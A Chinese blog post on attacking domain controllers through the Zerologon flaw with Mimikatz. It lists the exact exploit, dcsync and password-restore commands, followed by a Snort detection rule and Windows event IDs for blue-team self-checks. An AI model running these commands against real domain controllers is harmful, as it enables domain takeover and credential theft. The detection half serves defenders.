域控服务器排查命令,Mimikatz利用Zerologon攻击域控服务器相关命令(附蓝队自查方案)...

0x01 前言

mimikatz 20200918版本支持通过zerologon漏洞攻击域控服务器。下载链接如下https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20200918-fix

官方利用截图如下

df63505dae41ca0e4df172657c6bc536.png

mimikatz相关命令lsadump::zerologon /target:dc.hacke.testlab /account:dc$  poc

lsadump::zerologon /target:dc.hacke.testlab /account:dc$ /exploit  通过zerologon`漏洞攻击域控服务器

lsadump::dcsync

lsadump::postzerologon /target:conttosson.locl /account:dc$ #   恢复密码

8127d4c115f530eb65938e40b6783557.png

snort 检测规则alert tcp any any -> any ![139,445] (msg:"Possible Mimikatz Zerologon Attempt"; flow:established,to_server; content:"|00|"; offset:2; content:"|0f 00|"; distance:22; within:2; fast_pattern; content:"|00 00 00 00 00 00 00 00 ff ff 2f 21|"; within:90; reference:url,https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20200916; classtype:attempted-admin; sid:20166330; rev:2; metadata:created_at 2020_09_19;)

pcap包

windows事件管理器自查

在未打补丁的域控,重点查看windows事件管理器中,eventid为4742或者4624

在windows 8月更新中,新增事件ID 5829,5827,5828,5830,5831。蓝队可以重点关注这几个事件ID以方便自查当在初始部署阶段允许存在漏洞的Netlogon安全通道连接时,将生成事件ID 5829。

管理员可以监控事件ID 5827和5828,这些事件ID在存在漏洞的Netlogon连接被拒绝时触发

5830,5831  如果“域控制器:允许易受攻击的Netlogon安全通道连接”组策略允许连接。

mimikatz通过zerologon攻击成功后,将会留下事件id为4648。

参考

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值